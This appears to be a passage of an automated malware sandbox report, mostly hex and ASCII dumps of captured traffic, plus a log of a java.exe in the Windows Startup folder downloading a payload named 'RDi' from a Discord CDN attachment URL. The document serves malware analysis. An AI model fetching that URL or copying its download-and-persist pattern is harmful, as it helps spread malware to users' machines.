c8 fa c4 e5 e2 ec 90 ee d2 ed 34 1f f3 cd e9 e8 d1 d5 ea
                                                          Data Ascii: b6N1,+AE@<8[6X0d.$'-+k$")>$?H5",:JQH;wJ_uYMgGK]CHElonp[|jNzSXY/|]YQ}|>SQegm@sM4zhK4wY.[4
                                                          2022-02-07 11:03:22 UTC334INData Raw: 7c 41 47 6c 76 46 79 7e 64 ba f9 55 2d 54 6a 4c 18 6a 43 7f 42 56 10 54 54 8a ed 28 7b 7a 4c 68 49 6c 75 71 43 2c 45 78 11 ad e3 3d 69 68 48 47 5b 51 36 72 67 47 79 4d 4b bd 4c 89 cc 8d 99 cc ac 9f c0 97 b4 f4 83 9d a0 43 2a a4 be 89 9b d8 a7 8a d0 d6 ae 87 d6 d5 94 46 30 9b b3 8f 8a 90 bd d8 a3 e3 9d bf 86 82 e8 6e 04 8a f8 87 ad fc fc 86 b2 f7 83 85 84 83 82 4c 6a e5 e5 fd bb c2 ce d2 f5 83 fc fa d9 84 82 1d 6a c0 e3 ed da 9f ea ca ef d4 e7 cf d4 eb c3 15 1f dc f1 fd e8 e9 af c7 d0 f3 e1 db e3 e6 f8 00 61 fc 8d fe ba c3 e8 c5 f5 ed f1 f6 d1 c1 e4 1a 8c 14 0f 49 0b 13 0a 0f 3e 26 11 22 25 47 71 e3 9b 03 1d 2a 2a 5e 0b 0a 15 51 22 0e 3a 20 59 af bd 39 6e 6c 28 0e 1f 3c 25 14 55 05 23 38 15 e0 a3 17 19 7d 3d 2e 3c 3a 2e 2a 23 1e 0e 0f 35 ce db 50 04 6d 6a
                                                          Data Ascii: |AGlvFy~dU-TjLjCBVTT({zLhIluqC,Ex=ihHG[Q6rgGyMKLC*F0nLjjaI>&"%Gq**^Q": Y9nl(<%U#8}=.<:.*#5Pmj
                                                          2022-02-07 11:03:22 UTC338INData Raw: f9 d2 fa c2 19 6b e3 98 ce 98 93 c2 9b e8 eb e2 c2 e4 a2 92 30 54 f6 da d9 c3 aa c8 f7 f2 f1 d6 e5 c7 f6 c6 04 61 d6 f4 ef df f9 e3 f8 ea 86 b3 d4 b1 e5 d4 29 b7 49 07 0e 37 2d 1b 1d 3b 32 4c 1b 41 11 38 d9 a3 2e 1b 5e 25 6a 3d 5d 3f 5e 23 02 0c 00 3b d3 92 1d 3b 36 0d 3f 3e 1b 02 05 38 07 01 35 09 e2 a1 4f 2b 39 04 06 0a 06 08 03 08 02 24 20 14 c6 d2 51 6b 0f 6c 62 56 4d 56 7e 7c 59 69 32 5d 8b e8 66 4f 15 6f 66 5c 60 6f 4b 4c 13 14 4c 18 ba ed 70 2d 51 68 58 7d 2d 5b 16 7c 6e 26 23 25 96 da 67 74 47 51 4e 79 4f 52 4b 3c 72 6f 35 5b 99 0a 8b ab 90 95 fa bc 93 c1 9e be ac a7 ab bf 5f 04 ad ae 86 a9 92 8b da d6 a5 ac b0 ac db b9 55 11 df 8a bd b6 ae 9d 8a ba e4 91 87 91 85 b4 69 77 ad f8 9e a6 ff 8a 91 ab 8b 92 9d 84 c2 a2 0f 53 ec f5 f4 cc 8f fe ef e2 d4
                                                          Data Ascii: k0Ta)I7-;2LA8.^%j=]?^#;;6?>85O+9$ QklbVMV~|Yi2]fOof\`oKLLp-QhX}-[|n&#%gtGQNyORK<ro5[_UiwS
                                                          2022-02-07 11:03:22 UTC342INData Raw: ae 26 24 28 0b 2b 28 2d 23 06 24 21 2a 21 01 df 9d 17 ad 23 44 65 08 cd 1d 2c 12 12 06 00 55 ee 9d 37 0a 0a 1e 18 4d 09 15 32 02 02 16 10 45 fe 6d c2 fa fa ee e8 bd f9 e5 b6 f1 f4 f3 e0 c9 0b 6f ef ff d8 ef ea e9 fa da e2 e5 e4 f1 a2 e5 17 5f cd e5 d8 d3 da cb ec d3 de d5 c6 ee d6 d9 2f 5d 8f c9 ec ca c8 d5 cb e7 c6 cd c0 e3 c2 d3 32 3c 9f bd b2 bc aa b8 b9 a9 b6 ab b4 b4 82 b0 4e 2e bf b3 ac af aa a8 b4 bb a1 a3 b1 b1 e3 a0 4c 1f 9b bd 9c 88 9a 9d b0 97 85 95 97 95 80 d4 6c 09 9d c4 88 8b 8a 9b cd 83 86 85 96 ca 87 81 7e fe 6d 34 78 7b 7a 64 7d 71 76 74 66 7a 60 7c 88 ef 6d 7f 29 65 78 60 60 67 65 79 76 26 6c 73 d6 db 57 5d 4e 1e 5e 51 58 45 1f 51 5c 53 4f 54 ac c9 5d 01 48 4b 4a 5b 04 41 46 44 56 12 50 10 bb b7 3f 2f 70 38 3c 2b 6d 34 30 27 54 30 34 23
                                                          Data Ascii: &$(+(-#$!*!#De,U7M2Emo_/]2<N.Ll~m4x{zd}qvtfz`|m)ex``geyv&lsW]N^QXEQ\SOT]HKJ[AFDVP?/p8<+m40'T04#
                                                          2022-02-07 11:03:22 UTC346INData Raw: 28 cc a1 a3 86 a4 aa ad a6 81 5f 02 9c b8 9b 8a 87 9c 8a 17 73 88 86 12 8b 99 7d 8e 96 9c 0d ae 98 09 6d 95 07 a4 96 02 9f 9c 7a e7 62 78 74 7e 78 7b 71 73 70 64 f6 4a 7b 51 8d ee 7e ef 55 7a eb 28 60 67 62 64 7c 7e 67 69 97 d9 7f 5c 5d 49 db 44 5e 50 54 47 d5 4e 5b 59 8f cd 4e 5f 7d 59 cb 60 4b 67 46 40 47 63 42 42 ba 9f 3f 2c bd 16 39 19 38 3a 35 15 34 37 31 11 cf a9 2c 0d 2c 27 29 09 28 2e 25 05 24 28 21 01 df 98 1a 3d 1d 06 1f 11 1e 37 16 08 06 92 27 15 cf 8f 1d 14 0f 2b 0a 11 0f 27 04 17 5d 0b 1f 02 fa 5f fd f3 f2 f5 fe d9 f8 e5 bf f0 d4 f3 e3 70 4e 67 cf ef ed f9 db fb 69 a2 e8 c5 e7 f1 63 fc 0e de fa cc 5d 92 cb 58 95 cf d1 dc c9 d6 cf d4 32 4a dd 4c 99 d9 4b ac da 47 23 d7 45 aa d0 41 a2 36 b9 9d bd ba ab 38 e5 b1 96 b4 b5 a2 33 d0 46 0f ad bf 2d
                                                          Data Ascii: (_s}mzbxt~x{qspdJ{Q~Uz(`gbd|~gi\]ID^PTGN[YN_}Y`KgF@GcBB?,98:5471,,')(.%$(!=7'+']_pNgic]X2JLKG#EA683F-


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          2192.168.2.349811162.159.129.233443C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exe
                                                          TimestampkBytes transferredDirectionData
                                                          2022-02-07 11:04:16 UTC348OUTGET /attachments/939413016561205300/939787018140012564/RDi HTTP/1.1
                                                          Host: cdn.discordapp.com
                                                          Connection: Keep-Alive
                                                          2022-02-07 11:04:16 UTC349INHTTP/1.1 200 OK
                                                          Date: Mon, 07 Feb 2022 11:04:16 GMT
                                                          Content-Type: application/octet-stream
                                                          Content-Length: 177152
                                                          Connection: close
                                                          CF-Ray: 6d9c22f0c92c5c7a-FRA
                                                          Accept-Ranges: bytes
                                                          Age: 91364
                                                          Cache-Control: public, max-age=31536000
                                                          Content-Disposition: attachment;%20filename=RDi
                                                          ETag: "64a63f332c74248c2e4344632a8f0214"
                                                          Expires: Tue, 07 Feb 2023 11:04:16 GMT
                                                          Last-Modified: Sun, 06 Feb 2022 07:38:05 GMT
                                                          Vary: Accept-Encoding
                                                          CF-Cache-Status: HIT
                                                          Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                          x-goog-generation: 1644133085557986
                                                          x-goog-hash: crc32c=gVbjfA==
                                                          x-goog-hash: md5=ZKY/Myx0JIwuQ0RjKo8CFA==
                                                          x-goog-metageneration: 1
                                                          x-goog-storage-class: STANDARD
                                                          x-goog-stored-content-encoding: identity
                                                          x-goog-stored-content-length: 177152
                                                          X-GUploader-UploadID: ADPycdtyKsvJu6hvTH26yIp181qo0KfUZH23agjnxI4-NGl3yHoFRaH-EJa4vKBUHv60B0LLNUcDA1hqOqXWjw6VpRXTncWD0Q
                                                          X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ri1sSkjb42K3DQVZUubGML%2F9RAD9pOeX%2FUy0ru4tVOC%2FWeKk97%2BgeZyGWTphjSzq7Dqiu5SkkFEsAAdAS5QTZoLwEmK3AMQ7cD19zOW5MwHHZ8o%2BjT1YyFvT1wlnD%2BRVQb2EcA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          2022-02-07 11:04:16 UTC350INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                          Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                          2022-02-07 11:04:16 UTC350INData Raw: 42 35 7f ed ef eb ea e9 ec e7 e6 e5 1b 1c e2 e1 a7 5f df dd dc db da d9 98 d7 d6 d5 d4 d3 d2 d1 2f 4f cf cd cc cb ca c9 c8 c7 c6 c5 c4 c3 c2 c1 3f 3f bf bd bc bb ba b9 b8 b7 b6 b5 34 b3 b2 b1 41 30 15 a3 ac 1f a3 64 89 1f a7 e9 69 82 f6 c9 36 6c bf ed ee f4 fd eb f9 fa b6 f6 f5 fd fc fe 1b 2f ed e8 ac f9 ff e7 a8 ee e8 a5 c0 cc d1 a1 12 90 1b 18 52 76 77 73 5c 77 76 75 74 73 72 71 df aa 6f 6d 20 6a 69 69 05 dc ea 9b 64 63 62 61 9f df 5f 5d bc 5b 58 78 53 56 06 55 54 ff 50 51 af c9 4f 4d 4c 4b 4a 49 46 8c 44 45 44 63 42 41 bf 5f 3d 3d 3c 3b 3a 29 38 17 36 35 34 31 32 31 cb af 2f 2d 2c 2b 2a 29 2e 27 26 25 24 23 22 21 df bf 1c 1d 1c 19 1a 19 18 17 16 15 17 13 72 94 ef 8f 1f 0d 0c 1b 0a 09 08 07 16 05 04 13 02 01 ff 7f ff fd ec fb fa f9 f8 f7 f6 f5 f4 f3 f2
                                                          Data Ascii: B5_/O??4A0di6l/Rvws\wvutsrqom jiidcba_][XxSVUTPQOMLKJIFDEDcBA_==<;:)8654121/-,+*).'&%$#"!r
                                                          2022-02-07 11:04:16 UTC351INData Raw: db b5 26 6c 21 d9 86 8f 48 a7 56 0f 93 1d 30 df c8 25 65 1a 9b 0a 6a b3 f3 66 8b 69 8d 14 23 55 10 fc f6 b1 03 b9 6f 44 62 10 6d 1c 26 db 55 7f e0 44 88 3b 68 31 5e 41 00 1b cd 40 c3 4e 82 a5 5c 59 24 79 91 e2 60 e3 92 51 47 eb a8 54 c3 6f a8 29 a5 61 78 fb e1 0f f1 d0 4e 10 f6 14 9c d4 17 fa 43 3b bb 39 d1 d1 79 ff 7c f6 81 c9 52 7d b6 8b 3d ad b7 40 5a 90 1d ab c6 69 95 02 21 9e e1 b3 af 82 1a ee 09 e1 39 8a ae 20 39 59 47 23 73 97 11 0c db e3 1a bd a0 77 38 8a e2 ee 2a 64 20 ad dd 04 de 93 a8 08 d9 d6 6f 8e c1 89 12 3d f6 cb 7d ed f7 00 1a d0 5d eb 86 29 d5 42 61 de a1 f3 ef c2 5a ae 49 a1 79 ca ee 60 f9 99 87 e3 b3 57 d1 cc 1b 23 da 7d 60 b7 f8 4a 22 2e ea a4 e0 6d 1d c4 1e 53 68 c8 19 16 af 4e 75 e4 da c7 9d 89 d4 9f 9c c7 dc f3 93 d1 d3 11 42 02 62
                                                          Data Ascii: &l!HV0%ejfi#UoDbm&UD;h1^A@N\Y$y`QGTo)axNC;9y|R}=@Zi!9 9YG#sw8*d o=}])BaZIy`W#}`J".mShNuBb
                                                          2022-02-07 11:04:16 UTC353INData Raw: e5 6f 2b c1 01 89 eb 20 c6 9f 62 9c 98 15 eb aa 4f 69 8b de 7a 36 41 45 72 05 ba eb a9 fd ea 72 15 2d 91 37 01 0b fe 61 02 2d 21 87 0b e6 d7 3f ce 4b 8d 83 5d 9f 7c d9 e2 60 67 1c c1 27 ef f7 51 05 cf 60 d8 3c 1f 71 8e 9a 5e 54 04 8e 49 82 21 cf ca b7 8b d7 de 6b 03 43 22 05 3a 37 dd a8 56 2f 39 33 8c ea b0 40 96 e5 71 13 b9 67 fc a9 3f 09 c1 a2 3d a1 43 f7 60 54 8c d5 66 78 6c 18 4a 6b b5 cf fb 4c 38 ba 07 12 e7 c3 57 b6 e6 cc a6 2a 27 97 44 bc 07 3a ea 8e 9b 67 b7 d3 4b b5 17 b1 e0 e6 a6 1b e7 e3 67 cd e6 4e 43 95 97 2b 58 ec b3 79 2d d9 83 0d 2b 8e 2e 6d fd 9e fa 4c 65 70 b9 f6 be b6 1e 0c 0d 5d 1d a5 96 65 1f 41 8f ad 58 a5 8e 15 eb fd ba 06 b9 1d b3 e7 dd c5 8d 9e 4f a3 08 55 ed 81 02 ff 7c d6 0b e1 3c b7 42 0c 15 40 c8 d5 bf b6 10 9d 6b fa 9f 4b 4a
                                                          Data Ascii: o+ bOiz6AErr-7a-!?K]|`g'Q`<q^TI!kC":7V/93@qg?=C`TfxlJkL8W*'D:gKgNC+Xy-+.mLep]eAXOU|<B@kKJ
                                                          2022-02-07 11:04:16 UTC354INData Raw: 68 19 85 bd 49 bc 44 32 6e 81 01 95 03 4c cf 5d 59 e2 13 7a 2f c8 7e fb 98 f6 d5 0a 34 b5 d3 b0 d0 7b 7a 30 c1 47 52 37 65 e1 da 13 ac 9d 7c 29 3f 7e 6e 34 f9 26 29 09 ca 64 e1 1a 8d 31 4e dd a5 f7 72 ce ed e8 06 5d 54 a0 2f 6f 94 63 9f 9e d5 bd 1b 96 0b 1c 11 5b 18 50 7f 34 94 67 25 d3 aa ac 34 45 72 ec 6e 2e a6 f7 c1 8e af 7f 47 dd bb 9a 62 9b d6 4c 02 1a da d9 f4 b4 f2 71 09 de eb a8 12 dc 54 74 dc 74 79 c7 f8 ef d6 9e 49 ba 6f 70 9d b4 8c 76 8d ad 45 95 2c 87 75 76 fe 33 65 5e bd 57 3b 98 94 57 82 9f 6c 0d e0 53 f2 96 47 78 77 d5 75 8f 0a b8 a9 3e 75 9d dd 30 b1 28 64 b5 5c 9d 2b e9 0b b5 17 a5 d6 9f 99 6d 10 ab 5a 1c f1 45 e1 1b b0 8e 8a 6d 34 c3 45 64 d3 47 02 16 a1 e4 8a 3e af 92 95 92 f0 d0 df 6c e5 d9 c2 67 e6 bf 65 39 cd 0f ce 35 3a fa 0d 04 4a
                                                          Data Ascii: hID2nL]Yz/~4{z0GR7e|)?~n4&)d1Nr]T/oc[P4g%4Ern.GbLqTttyIopvE,uv3e^W;WlSGxwu>u0(d\+mZEm4EdG>lge95:J
                                                          2022-02-07 11:04:16 UTC355INData Raw: ac f4 d9 04 64 ae 21 79 4f ef 3c d2 03 d9 8b 8c af ac c1 57 e4 4f 77 0f e5 49 36 2d 61 ff e6 b1 74 7e 44 62 80 cf fa de cb a1 6c 59 c1 02 d3 c2 90 db cc 5b 2c 04 7e d8 4e 9e 94 d7 39 fd a6 59 bb 66 25 76 f5 d4 7f 16 d7 82 1f e6 83 fb 90 46 de de c7 e0 ec a2 f4 f8 a4 9b c3 15 8e d0 33 48 eb ca 7c 57 f0 3f 55 37 87 82 c2 30 5c cb dd 7e d2 b7 6f 7e d3 4d 3e 88 0a 71 74 0b 5e bb 4c bd 8d 62 a3 11 38 3c fe 64 60 7d e0 56 ab cc 61 5a bf a5 e4 79 ed 04 1b 18 2c ac b6 66 5d 17 96 bb 8e 99 b9 bb b6 69 94 73 a5 9b 22 5a 82 1e 2b 62 41 75 5d 99 c2 de 4c d4 12 3b 30 7c a7 ca 1d 0d 4b 65 7a 72 f8 22 e3 b9 9c 45 f7 cd b7 1b b1 ff 4f f4 e2 1e cb a2 1e a9 fe 33 b7 56 5a 4a 4d 15 fd 38 76 a3 8d 4b e9 09 a7 77 79 0b 44 c4 f8 61 23 da 06 b8 ae 24 90 68 fa 8b d1 78 fe 46 80
                                                          Data Ascii: d!yO<WOwI6-at~DblY[,~N9Yf%vF3H|W?U70\~o~M>qt^Lb8<d`}VaZy,f]is"Z+bAu]L;0|Kezr"EO3VZJM8vKwyDa#$hxF
                                                          2022-02-07 11:04:16 UTC357INData Raw: fd 9e 56 c4 46 b3 0e 42 4a 01 de fe a4 42 36 12 4d 22 ea 7f 75 44 dd f9 85 02 8b b9 56 4e 1a 70 6f 85 32 9e ea 59 21 b8 84 a2 70 68 8a e6 2b 95 51 c0 8d 3d 1d ad 2c 45 a6 73 32 53 64 21 79 f2 da b7 2b 25 a8 4e de 7c e6 c3 53 f1 30 3e 7e 78 40 58 2f c4 f2 be f0 e0 ab cf 67 ed 28 d8 6b 21 75 a0 d4 2f eb 6a 01 a0 95 de d8 18 32 65 5d c9 34 5c 6c 86 cf b3 3b 9e e5 8b ad 83 b7 02 7f b9 48 83 9a 86 0d ec 86 d5 f4 02 dd 31 2b 51 51 11 38 b1 ab d8 48 83 e9 65 d4 80 7f 12 44 7a 3d 5e 74 34 92 1f 70 33 3b 4b 54 81 d9 d5 16 df b6 a1 69 96 5f 1d 50 80 c1 c2 5a 3b 75 6b 2b 04 d5 54 3d 95 6d 63 e3 f3 4a c8 d3 58 11 84 23 e5 5b 9c 06 09 c7 3d eb f3 09 bf 79 10 e5 f9 22 34 b2 a0 d4 d8 05 40 50 cb a2 46 76 bd 88 f5 0b bd f5 d5 d8 dd 10 ea f4 ef d9 1e 66 60 ef b2 1c 39 6c
                                                          Data Ascii: VFBJB6M"uDVNpo2Y!ph+Q=,Es2Sd!y+%N|S0>~x@X/g(k!u/j2e]4\l;H1+QQ8HeDz=^t4p3;KTi_PZ;uk+T=mcJX#[=y"4@PFvf`9l
                                                          2022-02-07 11:04:16 UTC358INData Raw: f9 b0 54 30 a5 4c 22 1f 4b a6 d4 2d d7 0a 12 f9 2a 2c 50 8a 72 92 b5 b7 73 62 70 e2 eb 53 6f 30 47 9c d1 42 ec 36 d8 dd 20 eb 09 2c 58 95 ee da a6 b0 6d fe fd a1 31 3a a8 52 ca 86 61 dd 8a c5 6a 6d 8c 77 0f 51 ae 77 83 12 92 ac 76 40 04 d3 9e 0e 20 30 ab c9 09 c4 df ce 8d c8 2c 7f d3 3b a3 53 97 ac 76 26 5f a5 f0 c9 35 8b 75 23 fa 7a 5e 48 c5 b4 a5 35 1e 93 f6 30 2d 25 f0 37 7d 37 83 7c b8 16 c4 8e 21 26 2c 08 a0 c3 0a ff 4b 1d cf 55 40 20 02 96 6f ef ad 71 40 91 3e 67 fc 58 bc 06 de b2 52 de 29 71 59 65 a7 8c 19 c8 e4 6c a6 87 31 b4 ab 41 fd 20 d0 aa c9 89 6e ef 56 0d 58 5e 70 11 02 c9 df 5c 3a 2a f7 cd 33 8f 6b 33 10 60 25 b9 8a b2 dc 65 81 0b 9b ac d8 38 d4 7b 56 00 1b d3 c6 50 ec a1 53 8f 4a 2a 4f bf 33 0f 27 0c 7a 16 cf 8e 11 a7 89 6b c6 ea 5a 21 c7
                                                          Data Ascii: T0L"K-*,PrsbpSo0GB6 ,Xm1:RajmwQwv@ 0,;Sv&_5u#z^H50-%7}7|!&,KU@ oq@>gXR)qYel1A nVX^p\:*3k3`%e8{VPSJ*O3'zkZ!
                                                          2022-02-07 11:04:16 UTC359INData Raw: 4d c3 7b bc c1 d8 fd ed ee f8 01 7c 83 26 aa 73 9e 5d 7f 68 04 52 3d 76 f4 fb df 1b ae 66 b4 cb 73 17 f7 47 d9 20 26 34 9b 76 ca cb d9 ec 4d 23 56 40 c1 ed 7a d3 b8 1a 7e f2 82 22 e6 ba d2 e9 ab fb 43 d7 f2 2e 90 28 1e 60 a6 58 99 f5 a6 14 a8 6d 4f 7a 67 b4 97 74 c6 33 9a 38 49 3a a9 5f f5 17 c7 39 a9 c0 66 3d 35 7a 64 81 36 84 2b 78 d3 16 79 1c 47 58 e9 42 84 6f 72 9a 70 cb 64 00 76 57 16 cb b4 1b ab e1 c8 92 54 bd f3 48 af be ce ab 5f 57 21 c2 4c d9 3f 95 63 e3 25 1a 55 8c 1d f2 b1 fc e4 fa 16 d1 5c 9f 57 b8 bf f6 ea f2 46 cb 03 c2 f1 e8 72 c3 39 4e ff fb 1e 0f 0d ba f3 f2 37 be b9 dc c8 d4 32 8f f5 0f b2 6c f4 b4 c7 42 d3 4f 2c 68 58 18 bd d0 c0 31 23 9f 1e 10 61 3c 28 7b 1a d1 e7 85 21 6b 14 65 4a 07 56 3a c1 97 c2 65 99 8e be 95 91 da 29 d7 89 61 70
                                                          Data Ascii: M{|&s]hR=vfsG &4vM#V@z~"C.(`XmOzgt38I:_9f=5zd6+xyGXBorpdvWTH_W!L?c%U\WFr9N72lBO,hX1#a<({!keJV:e)ap
                                                          2022-02-07 11:04:16 UTC361INData Raw: c1 52 95 06 66 df 07 e4 47 0b 06 03 80 12 ee 12 97 f4 8c 92 0a ed fc 8b 9d 12 3b a8 50 67 e7 cb 9c c1 d6 9c 32 14 53 37 a3 18 1a a2 a1 c8 2e bd 86 8f 75 ee 36 e0 2a 18 ef 44 50 29 ac ae ec 22 0a 82 35 f4 a4 d0 57 1d 72 13 ce 47 d2 9d 38 4d 01 94 93 07 a3 8a 9a 0a 0d b4 f3 34 9b 95 b3 78 fe 73 b8 fe 4f 1c f3 2e 52 64 c7 35 03 be 3d 2a ed ce a4 8f 5e da 51 c5 58 7e 52 91 ae a5 a0 70 e5 4b 66 94 bf 69 7c 4c de 84 82 ee 24 cd ea 90 f2 87 aa f4 31 fd 78 e1 d9 46 f8 6b 51 a6 bf 60 09 ff a1 d9 3f 28 7b 4e 14 45 41 e5 24 5d 39 94 b9 5b 71 c0 34 e5 12 8b 5d 67 58 e6 eb 7d b1 96 57 44 06 4d c4 d2 7c cc f1 78 e0 07 82 34 47 b6 1a 7b 5f 92 e5 14 20 52 39 ef b6 90 84 33 64 fc f8 ef 3e b0 e8 7d 62 46 7a c7 23 25 6a 09 d9 0a b6 d6 8a 0d 76 ee e9 f7 5d 9f 3c 48 5e 25 1c
                                                          Data Ascii: RfG;Pg2S7.u6*DP)"5WrG8M4xsO.Rd5=*^QX~RpKfi|L$1xFkQ`?({NEA$]9[q4]gX}WDM|x4G{_ R93d>}bFz#%jv]<H^%
                                                          2022-02-07 11:04:16 UTC362INData Raw: ae 9e 34 93 ce f0 f7 fd ee c4 36 cc 88 ad 02 fe 37 12 b1 16 9d b8 8a cf 86 95 9e fb 19 ca 66 b0 7a 8b 6d d6 7b 45 b6 1b 1e a3 e7 c8 43 c9 50 77 99 a5 d9 fd b8 18 2d 3e b5 c6 9f 99 0b 08 93 d2 67 98 e0 fe 4d 54 9f ce 19 3e a2 f4 75 b6 3b 24 52 59 19 ff 4b aa 83 31 e1 f8 7e d2 c1 f0 07 00 88 69 aa b5 23 8c e7 ca b1 70 18 0e fd c2 fe 52 93 11 ee 34 dd 50 3f b4 13 55 b2 56 36 36 40 e6 62 71 9a e1 97 e1 63 2d 62 a2 2a 52 b7 fa 2e 84 ef 37 9f 2c d9 01 c2 2b 19 87 cf 6b 60 07 7e fa 0c 45 f5 3c cb 44 d7 61 fe 15 ea 9f 0a b8 79 a0 85 cb 39 90 d9 ac e5 89 87 6e 78 41 5f 2f c2 98 76 7c 7a e6 93 d1 60 d3 0b 82 07 f9 b8 23 a2 c7 d1 21 28 68 0c 77 a5 e7 fb cd 49 2e 64 22 36 19 46 d4 e3 7e 57 aa 4d f0 7f 1f e6 4b 47 3e 50 17 c3 05 88 4d cf 31 18 47 2f ea 17 7e 44 6c 76
                                                          Data Ascii: 467fzm{ECPw->gMT>u;$RYK1~i#pR4P?UV66@bqc-b*R.7,+k`~E<Day9nxA_/v|z`#!(hwI.d"6F~WMKG>PM1G/~Dlv
                                                          2022-02-07 11:04:16 UTC363INData Raw: c2 df f1 75 97 69 f1 01 cf 31 94 8a f2 18 fb 19 e1 6a 13 b1 e0 ee fc e3 d3 75 93 b1 43 b9 6a 82 0a 53 19 6f db 30 f7 33 4c 82 56 f3 dc a6 e7 98 26 36 86 6f 63 92 5e a3 43 f7 70 a7 06 7f e2 47 35 aa 90 6f 93 c7 1b a3 75 db d9 4f 11 71 6f ab 23 24 70 3b a1 ff 47 6f 5a c7 30 70 f6 8a 3c 99 ba bf 59 ba 2c e7 5c 25 a5 b9 3e 23 16 5c 39 c1 21 7f bb 46 8b 26 36 ce 68 4b 5d 3e bd 8e 44 63 ad 9d 09 ee 7f 8c 9b 14 2e a2 73 d3 2c 28 e9 c0 0f e3 38 04 70 ef 1b 91 8f 8d 35 d2 27 21 da c5 23 ad a7 0e de 79 11 6c d7 0b 45 02 c8 99 ef 11 d5 74 5f 27 a5 82 07 dc 55 8c 6b 57 c4 75 e2 65 99 81 63 26 f5 0b 2b ef 2c f9 78 b6 6b fd 58 f8 b9 ea 22 8d 14 ab d0 29 89 f1 bd 41 a5 5e ad bd 3f e7 5d 12 e8 28 60 75 5e d0 07 ff f7 20 42 01 e3 e2 84 18 07 82 6a 18 83 32 3e 56 27 86 2d
                                                          Data Ascii: ui1juCjSo03LV&6oc^CpG5ouOqo#$p;GoZ0p<Y,\%>#\9!F&6hK]>Dc.s,(8p5'!#ylEt_'UkWuec&+,xkX")A^?](`u^ Bj2>V'-
                                                          2022-02-07 11:04:16 UTC365INData Raw: b8 f6 87 b1 04 a0 ba af 0c d9 d8 56 08 20 c0 75 35 92 c1 3e c7 e7 ef 36 ed f6 b7 6b ee a1 3a 2e bf 39 54 5a 6e 7c 72 ff 42 9c ec 69 17 48 47 9c fa a4 44 64 bb f4 66 c3 cf ca d2 e2 f0 a2 0a 22 ac 8a 69 cb a3 cf 71 56 63 f3 98 6d ef 97 c6 32 1b 40 f8 2b f4 de 1c 36 ed 85 be fb d4 26 39 cc e5 12 7c 56 19 1e 95 42 8f 07 00 69 cd a2 99 25 23 78 22 7b bf 49 2b 7a 18 d3 15 89 f4 1d c1 db 5e a4 b5 b9 3f 7a 33 a4 bf ab a6 d7 bf ba a6 d0 22 92 2c f7 a8 a8 b7 94 9d a7 e3 76 8d 9e 2b cd d6 90 5c 85 bb 46 0d f1 8e ee ef 09 ac c1 8a ba ae bf 52 2a 55 97 6f 11 fb 7b c1 99 ca bb b2 2f 0a bd 68 04 89 bd 84 c1 61 59 c6 d6 c9 af 0d c5 b8 46 3f 6e c3 c0 29 44 c7 2f bd 9d 4d d3 8e 0c 38 9c 9c d3 0e 83 bc 77 e1 da b9 b7 13 55 91 ba 19 64 9f 16 ec ac c0 40 d0 01 d4 cc 74 73 aa
                                                          Data Ascii: V u5>6k:.9TZn|rBiHGDdf"iqVcm2@+6&9|VBi%#x"{I+z^?z3",v+\FR*Uo{/haYF?n)D/M8wUd@ts
                                                          2022-02-07 11:04:16 UTC366INData Raw: 93 2a 82 f4 4f 41 d1 e2 d0 b3 39 28 ca 02 4d 63 e7 98 4c 51 f4 9b 2e f0 d8 11 86 8d 58 34 7d 5f e4 9b 8b 5e de b1 ff 22 80 91 c2 ca c0 4d 0f 24 5e a5 a5 54 14 eb c2 c9 26 74 05 7b 5b 9c e2 04 c4 20 c2 25 2d 0c ae 9b 3b 8e 3a e8 ac 5e 1b f9 07 d1 d1 37 a4 d9 98 e3 42 d1 21 a3 e6 9d 85 9d e6 4b bf e1 34 33 a6 86 67 d3 ff ae bf e5 80 b7 84 2d c6 ee e8 28 b8 c0 c2 e8 aa ad 55 34 15 75 ea 1a 01 ce 0a 45 8b f1 1d 83 8f bb f7 b2 17 dd 91 d1 cc b5 c6 61 2a fb a3 4c 0d 0f dc 41 01 65 37 00 66 b5 a3 21 c2 fb 6d 9e ed 2f 82 c5 44 b8 78 f1 34 77 86 30 a1 7a 6d fe 55 97 c8 02 76 47 d7 7f 2e 58 2c 12 a8 37 6a 3b ad c2 6c d2 a5 ad 2c 47 25 1a 55 5c 75 09 89 35 bd db f8 82 13 87 f5 66 6d 60 82 f3 cc ce 16 f8 11 6c 7a b7 59 b7 c1 9d d7 fd 01 0c 51 2f 7b a3 c9 e6 cc c5 ea
                                                          Data Ascii: *OA9(McLQ.X4}_^"M$^T&t{[ %-;:^7B!K43g-(U4uEa*LAe7f!m/Dx4w0zmUvG.X,7j;l,G%U\u5fm`lzYQ/{
